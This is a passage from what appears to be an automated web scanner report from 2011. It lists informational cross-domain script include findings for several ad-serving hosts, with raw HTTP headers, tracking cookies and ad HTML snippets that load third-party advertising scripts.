Referer: http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36Yrn7XrB9XqepRUvZcTbQ4WtUWosZbAxdcios/2401306/wrapper1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 342

<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/">
</script>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aHmN7ERU7NYEZbo4Tjl4E71nTBAXF3dWHZbUn6rKpGvooHYH3TZbf3dIo5AjIpbbZaYsQW1VUV0VbpmaBR5bZbUWFnEW6v1REYQQGQsStZbr1tBxWmbN4c3UXFUZbVmqs46r9PPMC2dBq1HYZdmHEo3m3W5G3fUVY6Vc78PSYJxdcGNO/

Request

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 348

<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aHmN7ERU7NYEZbo4Tjl4E71nTBAXF3dWHZbUn6rKpGvooHYH3TZbf3dIo5AjIpbbZaYsQW1VUV0VbpmaBR5bZbUWFnEW6v1REYQQGQsStZbr1tBxWmbN4c3UXFUZbVmqs46r9PPMC2dBq1HYZdmHEo3m3W5G3fUVY6Vc78PSYJxdcGNO/">
</script>

18.7. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

18.8. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3671.CentroNetwork/B5159652.2;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?

Request

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 1767
Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;">
<IFRAME SRC="http://ad.doubleclick.net/adi/N3671.CentroNetw
...[SNIP]...
lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3671.CentroNetwork/B5159652.2;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?">
</SCRIPT>
...[SNIP]...

18.9. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3671.CentroNetwork/B5159652.2;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=fynY-cEEjEyoo-jgd2DP245a7fJlfzaqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?

Request

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 1767
Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADy5OcAyjtDTQAAAAAAAAAAAAAAAAAAAABbc0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;">
<IFRAME SRC="http://ad.doubleclick.net/adi/N3671.CentroNetw
...[SNIP]...
MLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3671.CentroNetwork/B5159652.2;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=fynY-cEEjEyoo-jgd2DP245a7fJlfzaqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?">
</SCRIPT>
...[SNIP]...

18.10. http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3671.CentroNetwork/B5159652.2

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.270604.B3/B5112048

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.12. http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.TribalFusion.com/B5132291.17

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.13. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.10

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:48:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401740&migRandom=6953850&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740"></script>
...[SNIP]...

18.14. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.10

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:14:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5295

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349"></script>
...[SNIP]...

18.15. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.5

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40401508
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5224
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:54:37 GMT
Expires: Sat, 29 Jan 2011 01:54:37 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087444;234174383;40401508&migRandom=4959045&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40401508"></script>
...[SNIP]...

18.16. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.5

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40400763
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5221

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087444;234174383;40400763&migRandom=7532183&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40400763"></script>
...[SNIP]...

18.17. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.6

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5224

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40401586&migRandom=7509933&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586"></script>
...[SNIP]...

18.18. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.6

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 00:26:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5225

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40400793&migRandom=8067481&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793"></script>
...[SNIP]...

18.19. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.6

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 00:22:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5016

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;39969205&migRandom=7819559&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205"></script>
...[SNIP]...

18.20. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:03:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5222

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=1887560&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

18.21. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5215

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401349&migRandom=7510980&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349"></script>
...[SNIP]...

18.22. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=39969225
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:06:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5008

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;39969225&migRandom=5658295&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=39969225"></script>
...[SNIP]...

18.23. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4270.Tribal_Fusion/B5094437.2

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.24. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.msn/B2087123.382

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.25. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.152304.TRADEDESK/B5157804.4

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.26. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.152304.TRADEDESK/B5157804.5

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.27. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5956.Advertising.com/B3941858.17

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.28. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.5;abr=!ie;sz=300x250;ord=7951675187229449762?;click=http://r.turn.com/r/tpclick/id/Il4Z-HMGWm5UNwUAbAABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:55:09 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=Q2BDGLjfiARZbN8b3TXoKCNCtKIL-r9iDqITQDnnSsaY481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOaoxd_oldZyM_0h2lwQ2vV-oPWvpR2lvg2CTziw80-4eo8F9xA-g6RuoYQKpeVv73XLQkHE3nbfiVxApQ1oZYbmX9ZeDk-Z9Mb4drqyLE7KPtnmkfeQoFbVixLdk5YAN4PGnMoZ0x3TQuKe2B1edDEU6sFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIK